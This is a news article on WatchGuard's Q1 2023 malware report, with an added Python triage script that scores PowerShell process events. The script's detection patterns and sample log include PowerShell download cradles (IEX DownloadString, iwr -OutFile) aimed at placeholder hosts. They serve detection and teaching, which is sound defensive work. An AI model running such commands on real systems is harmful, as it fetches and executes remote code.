Security report Q1/23: New malware often from Russia and China 

Image by Egonetix_xyz on Pixabay


Cyber attackers are constantly coming up with new attack methods. The security report for the first quarter of 2023 not only shows new traps, but also finds that three of the four newcomers on the top 10 malware list come from Russia and China.

According to WatchGuard's Internet Security Report, attackers are now discovering new ways to trick users surfing the Internet. After web browsers have recently upgraded their protection mechanisms against pop-up abuse, cybercriminals are now focusing on the still relatively new browser notification options.

Malware trends for Q1/2023

As the analysis of malware trends and attempted attacks on networks and end devices for the first quarter of 2023 shows, the browser's permission prompts for such notifications are being abused with increasing frequency. The main aim is to trick users into installing malicious software or subscribing to overpriced "anti-malware" services. In addition, SEO poisoning, a technique that has long been old hat, is making a comeback. In this type of attack, cybercriminals build SEO-optimized websites that rank as high as possible in search results for currently trending search terms and entice the searcher to click. It is not uncommon for malware to be waiting at the destination, delivered via drive-by download.

Businesses need constant attention

"In any case, companies are well advised to consistently and actively pay attention to the existing solutions and strategies for protecting their own organization," concludes Corey Nachreiner, Chief Security Officer at WatchGuard. "Consistent with the threat posed by living-off-the-land attacks and other sophisticated threats, the importance of layered malware defenses is extremely high. Platforms that uniformly bring together comprehensive IT security functionality and are managed by professional managed security service providers provide a reliable foundation for this."

Key findings from the WatchGuard Internet Security Report Q1/2023

Actors from China and Russia are behind 75 percent of the threats newly appearing in the top malware ranking

Three of the four newcomers to WatchGuard's top ten malware list have close national ties, but that does not necessarily mean the cybercriminals behind them are government-sponsored. A specific example is the Zuzy malware family, which made its debut in the top 10 malware list. One variant, for example, targets the Chinese population with adware and attempts to install a compromised browser that rewrites the system's Windows settings to make itself the new default browser.

Ongoing attacks on Office products and the discontinued Microsoft ISA Firewall

The most widespread attack scenarios are still document-based attacks on Office products. On the network side, the WatchGuard Threat Lab also recorded numerous hits from exploits against the outdated Microsoft firewall "Internet Security and Acceleration (ISA) Server". This is surprising given that Microsoft discontinued the product long ago and no longer supports or updates it, which makes it all the more notable that attackers are still targeting it.

Living-off-the-land attacks are on the rise

The "ViperSoftX" variant discovered during DNS analysis is the latest example of malware that uses tools built into the operating system to achieve its goals. The repeated emergence of Microsoft Office- and PowerShell-based malware underscores the importance of endpoint protection that can distinguish between legitimate and malicious use of popular tools such as PowerShell.
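The distinction the report asks endpoint protection to make is, in practice, a scoring problem over process telemetry: the same `powershell.exe` binary runs nightly backups and download cradles alike, so the verdict has to come from the parent process, the parameters and what an encoded command actually decodes to. The following is an added example for this article, not WatchGuard code and not the Threat Lab's detection logic; it assumes a simple `time|host|user|parent|command_line` record layout, invents its own indicator weights and an allow-listed script directory, and all four sample events are constructed.

```python
"""Heuristic triage of PowerShell process-creation events.

Added example for this article; it is not WatchGuard code and does not
reproduce the report's detection logic. It shows one way endpoint telemetry
can separate routine administrative PowerShell use from the living-off-the-land
patterns the report describes. The log format, indicator weights, allow-list
and all sample events below are constructed for the example.
"""
import base64
import re

# Indicator table: (name, regex, weight). Case-insensitive because PowerShell
# parameters are, and because abbreviations (-nop, -w hidden, -enc) are common.
INDICATORS = [
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), 2),
    ("no_profile", re.compile(r"-no(?:p|profile|ni|ninteractive)\b", re.I), 1),
    ("policy_bypass", re.compile(r"-e(?:p|x|xec|xecutionpolicy)\s+bypass", re.I), 2),
    ("encoded_command", re.compile(r"-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}", re.I), 3),
    ("download_cradle", re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient", re.I), 3),
    ("invoke_expression", re.compile(r"invoke-expression|\biex\b", re.I), 2),
]
ENCODED_ARG = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)

# Parents that rarely have a legitimate reason to spawn PowerShell (document-based attacks).
DOCUMENT_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Allow-listed script locations (constructed): an unobfuscated -File run from
# one of these directories is treated as routine administration.
ALLOWED_SCRIPT_DIRS = ("c:\\programdata\\monitoring\\", "c:\\scripts\\")
SCRIPT_ARG = re.compile(r"-f(?:ile)?\s+\"?([^\s\"]+\.ps1)", re.I)


def decode_encoded_command(cmdline):
    """Return the UTF-16LE text behind -EncodedCommand, or None if absent or invalid."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_event(parent_image, cmdline):
    """Score one process-creation event; returns (score, matched indicator names)."""
    hits, score = [], 0
    decoded = decode_encoded_command(cmdline)
    # Scan the visible command line and, when present, the decoded payload,
    # so a cradle hidden inside -enc still counts.
    texts = [cmdline] + ([decoded] if decoded else [])
    for name, pattern, weight in INDICATORS:
        if any(pattern.search(t) for t in texts):
            hits.append(name)
            score += weight
    if parent_image.lower() in DOCUMENT_PARENTS:
        hits.append("document_parent")
        score += 3
    # Allow-list: a plain -File run from a managed directory with no
    # obfuscation or download indicators is routine, whatever flags it used.
    m = SCRIPT_ARG.search(cmdline)
    strong = {"encoded_command", "download_cradle", "invoke_expression", "document_parent"}
    if m and m.group(1).lower().startswith(ALLOWED_SCRIPT_DIRS) and not (strong & set(hits)):
        hits.append("allowlisted_script")
        score = 0
    return score, hits


def verdict(score):
    """Map a score onto the three-level outcome an analyst queue would use."""
    if score >= 6:
        return "malicious"
    if score >= 3:
        return "suspicious"
    return "benign"


def triage(log_text):
    """Parse 'time|host|user|parent|command_line' records and return one result per event."""
    results = []
    for line in log_text.strip().splitlines():
        ts, host, user, parent, cmdline = line.split("|", 4)
        score, hits = score_event(parent, cmdline)
        results.append({"time": ts, "host": host, "user": user, "score": score,
                        "verdict": verdict(score), "hits": hits})
    return results


# Constructed sample telemetry. The third event carries a base64/UTF-16LE
# -EncodedCommand built here so the decoder is exercised; URLs use the
# reserved .invalid TLD as placeholders.
_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://placeholder.invalid/a')"
_ENC = base64.b64encode(_CRADLE.encode("utf-16-le")).decode("ascii")
SAMPLE_LOG = "\n".join([
    r"2023-03-14T09:12:03Z|WS-042|CORP\jdoe|explorer.exe|powershell.exe -NoProfile -File C:\Scripts\backup.ps1",
    r"2023-03-14T09:13:10Z|SRV-07|SYSTEM|services.exe|powershell.exe -ExecutionPolicy Bypass -File C:\ProgramData\Monitoring\collect.ps1",
    f"2023-03-14T09:15:41Z|WS-042|CORP\\jdoe|WINWORD.EXE|powershell.exe -nop -w hidden -ep bypass -enc {_ENC}",
    r'2023-03-14T09:20:55Z|WS-118|CORP\asmith|cmd.exe|powershell.exe -w hidden -c "iwr http://placeholder.invalid/b -OutFile t.exe"',
])

if __name__ == "__main__":
    for event in triage(SAMPLE_LOG):
        print(f'{event["time"]} {event["host"]:7} {event["verdict"]:10} score={event["score"]:2} {event["hits"]}')
```

The two allow-listed events score zero even though one of them uses `-ExecutionPolicy Bypass`, while the Word-spawned encoded command accumulates hits from both the visible flags and the decoded cradle; that asymmetry, not any single flag, is what lets the same binary be classified differently.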

New malware dropper targeting Linux-based systems

The emergence of a new Linux-targeted malware dropper proves once again that attackers are by no means targeting only Windows, the mainstay of enterprise operating systems. Linux and macOS users should never feel too safe. It is therefore essential to ensure that all end devices are covered without exception when introducing and using Endpoint Detection and Response (EDR) functionality, regardless of their operating system.

Zero-day malware accounts for the lion's share of the threats identified

In unencrypted web traffic, zero-day malware accounts for 70 percent of the total volume of security-relevant discoveries, and in encrypted data traffic it is even 93 percent. The enormous risk that IoT devices, incorrectly configured servers or other devices will become a gateway for attackers is therefore more than obvious. Host-based security functionality (such as that offered by WatchGuard EPDR) provides a reliable remedy here.

New ransomware tracking

Corey Nachreiner, Chief Security Officer (CSO), WatchGuard Technologies (Image: WatchGuard).

The new tracking, carried out for the first time during the analysis for the Internet Security Report Q1 2023, also provided important additional insights: the Threat Lab identified 51 new ransomware variants and, by counting announcements on the relevant extortion websites, arrived at a total of 852 companies newly joining the group of organizations affected by a ransomware attack. Sadly, the frequency of such announcements is steadily increasing, and the victims include a number of well-known companies and Fortune 500 corporations.

Framework data for analysis

WatchGuard's quarterly research reports are based, in accordance with the concept of the "Unified Security Platform", on the anonymized, aggregated data of all active WatchGuard solutions for network and endpoint protection whose owners have agreed to share threat intelligence in support of the Threat Lab's research work. What is new this time compared to previous editions of the Internet Security Report is the method of evaluation, analysis and presentation of results.

From now on, results in the area of network security are no longer presented in terms of total volumes, but as average values per device according to the population of appliances considered. The reasons are discussed in more detail in the full report. This also contains numerous details on other malware and network trends from the first quarter of 2023, corresponding recommendations for security strategies, important defense tips for companies of all sizes and industries and much more.


About WatchGuard

WatchGuard Technologies is one of the leading providers in the field of IT security. The extensive product portfolio ranges from highly developed UTM (Unified Threat Management) and next-generation firewall platforms to multifactor authentication and technologies for comprehensive WLAN protection and endpoint protection, as well as other specific products and intelligent services relating to IT security. More than 250,000 customers worldwide rely on the sophisticated protection mechanisms at enterprise level,

